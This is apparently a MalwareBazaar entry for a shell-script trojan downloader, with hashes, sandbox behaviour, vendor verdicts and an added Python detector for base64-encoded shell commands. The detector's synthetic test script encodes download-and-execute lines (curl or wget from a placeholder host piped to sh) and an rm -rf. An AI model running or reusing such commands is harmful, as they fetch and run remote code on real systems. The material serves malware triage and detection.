MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 7



SHA256 hash: 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534
SHA3-384 hash: 50062d2c220ece79a08886c070850484ffc207b3ceb550d69c7711c23bbe4ecc252f8ea9c2be49d7bbcdf8cee7526b9e
SHA1 hash: 2d969c0a1e6b67f7067d617045ba554fc5fee8a7
MD5 hash: 648ed31c1891325ff0be0d9b06403c03
humanhash: cold-orange-island-tango
File name: k.php
Download: download sample
File size: 19'499 bytes
First seen: 2026-03-09 09:46:32 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 384:GFcuQpWx+BL0SWL0gkzsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:GF8i+BL0SI07zsP4cbddr7zsP4cbddrk
TLSH: T1BA925CB512896C79FBD0CE399F3C7F4DADE882C42124A3ACBA0F39215A1166DC60535A
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh

Intelligence


File Origin
# of uploads: 1
# of downloads: 52
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive masquerade

Verdict: Malicious
File Type: unix shell
Detections: HEUR:Trojan-Downloader.Shell.Agent.bc
Status: terminated
Behavior Graph (process tree recovered from the graph export; pids are the sandbox's, edge type in parentheses, file events in brackets):
  3351 /usr/bin/sudo
    3356 /tmp/sample.bin (execve)
      /usr/bin/bash x7 (clone: 3358, 3359, 3404, 3405, 3406, 3446, 3447); /usr/bin/bash 3449 (execve)
      /usr/bin/mkdir x7 (execve: 3360, 3361, 3363, 3365, 3367, 3368, 3369)
      /usr/bin/cp x15 (execve: 3371, 3372, 3373, 3374, 3377, 3380, 3382, 3385, 3387, 3389, 3391, 3394, 3396, 3398, 3401)
      /usr/bin/touch 3402 (execve)
      /usr/bin/base64 3407 (execve) [write-file]
      /usr/bin/rm 3444 (execve) [delete-file]; /usr/bin/rm 3451 (execve)
      3410 /usr/bin/bash (execve)
        /usr/bin/bash x4 (clone: 3411, 3412, 3426, 3434)
        /usr/bin/ls x5 (execve: 3414, 3418, 3431, 3437, 3442)
        /usr/bin/cat x2 (execve: 3416, 3440)
        /usr/bin/mkdir 3421 (execve)
        /usr/bin/mv 3423 (execve)
        /usr/bin/base64 x2 (execve: 3427, 3435) [write-file]
        /usr/bin/rm 3429 (execve) [delete-file]
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Script-Shell.Trojan.Vigorf
Status: Malicious
First seen: 2026-03-09 09:47:15 UTC
File Type: Text (Shell)
AV detection: 13 of 24 (54.17%)
Threat level: 5/5

Result
Malware family: n/a
Score: 4/10
Tags: defense_evasion discovery linux
Behaviour:
Reads runtime system information
Writes file to tmp directory
Deobfuscate/Decode Files or Information
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: SUSP_LNX_Base64_Exec_Apr24
Author: Christian Burkard
Description: Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference: Internal Research
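The sandbox behaviour recorded for this sample (three /usr/bin/base64 executions with write-file events, "Deobfuscate/Decode Files or Information") and the YARA rule description (suspicious base64 encoded shell commands) point at the same triage step: find the base64 literals a script feeds into a decoder and see what they decode to and where the result goes. The script below is an added example written for this page; it is not MalwareBazaar code and not the SUSP_LNX_Base64_Exec_Apr24 rule, whose actual strings are not reproduced here. The regexes, the decode_b64_exec function and SAMPLE_SCRIPT are assumptions constructed for the example, and SAMPLE_SCRIPT is synthetic, not the k.php file from this entry.

```python
"""Recover base64-encoded shell commands from a script (static triage).

Added example for this page; it is not MalwareBazaar code and not the
SUSP_LNX_Base64_Exec_Apr24 rule. It implements the idea the rule
description names: a base64 literal piped through a decoder and on into
an interpreter or a file. The regexes and SAMPLE_SCRIPT are assumptions
constructed for the example.
"""
import base64
import binascii
import re

# A literal handed to echo/printf that looks like base64. The 16-char
# minimum keeps ordinary words such as "hello" from being decoded.
B64_LITERAL = re.compile(
    r"(?:echo|printf)\s+(?:-\w+\s+)*['\"]?([A-Za-z0-9+/=]{16,})['\"]?")
# The decode stage: base64 -d / -D / --decode (GNU and BSD) or openssl.
DECODE_PIPE = re.compile(
    r"\|\s*(?:base64|openssl\s+base64)\s+(?:-d|-D|--decode)\b")
# Decoded bytes piped straight into a shell or script interpreter.
PIPE_TO_INTERP = re.compile(r"\|\s*(?:(?:ba|da|z)?sh|python3?|perl)\b")
# Decoded bytes consumed via command substitution: sh -c "$(...)", eval "$(...)".
SUBST_INTO_INTERP = re.compile(r"(?:sudo\s+)?(?:(?:ba|da|z)?sh\s+-c|eval)\s")
# Decoded bytes written to disk (the sandbox's "base64 write-file" event).
# The lookbehind skips fd redirects such as 2>/dev/null.
REDIRECT = re.compile(r"(?<![\d&])>>?\s*(\S+)")


def decode_b64_exec(script: str) -> list[dict]:
    """Return one finding per line whose base64 literal reaches a sink."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        dec = DECODE_PIPE.search(line)
        lit = B64_LITERAL.search(line)
        if not dec or not lit or lit.end() > dec.start():
            continue
        try:
            decoded = base64.b64decode(lit.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64; do not guess
        tail = line[dec.end():]    # what is done with the decoded bytes
        head = line[:lit.start()]  # what wraps the pipeline, if anything
        target = None
        if PIPE_TO_INTERP.search(tail) or SUBST_INTO_INTERP.search(head):
            sink = "interpreter"
        elif (m := REDIRECT.search(tail)):
            sink, target = "file", m.group(1)
        else:
            sink = "stdout"
        findings.append({
            "line": lineno,
            "sink": sink,
            "target": target,
            "decoded": decoded.decode("utf-8", "replace"),
        })
    return findings


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample script for this example; it is NOT the k.php sample.
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/sh",
    "mkdir -p /tmp/.x",
    f"echo '{_b64('curl -s http://example.invalid/stage2 | sh')}' | base64 -d | sh",
    f"echo {_b64('rm -rf /tmp/.x/*')} | base64 -d > /tmp/.x/clean.sh",
    f'bash -c "$(echo {_b64("wget -q -O /tmp/.x/bin http://example.invalid/bin")} | base64 -d)"',
    "echo hello | base64 -d 2>/dev/null",
])

if __name__ == "__main__":
    for f in decode_b64_exec(SAMPLE_SCRIPT):
        where = f["target"] or ""
        print(f"line {f['line']}: {f['sink']} {where} -> {f['decoded']}")
```

The matcher only sees a literal that is complete on one line; a here-document, a literal assembled from several variables, or a payload read from a file it copied earlier (this sample runs cp fifteen times before its first base64 call) will not be recovered statically. That blind spot is why the sandbox's process-level base64 write-file events are worth keeping next to any static match.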

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via web download
Web download: sh 2ccbcf84f35dfdd608eb77d78bae3dfe4f6059c5c1b8aa0708c1d4d315b38534 (this sample)

Comments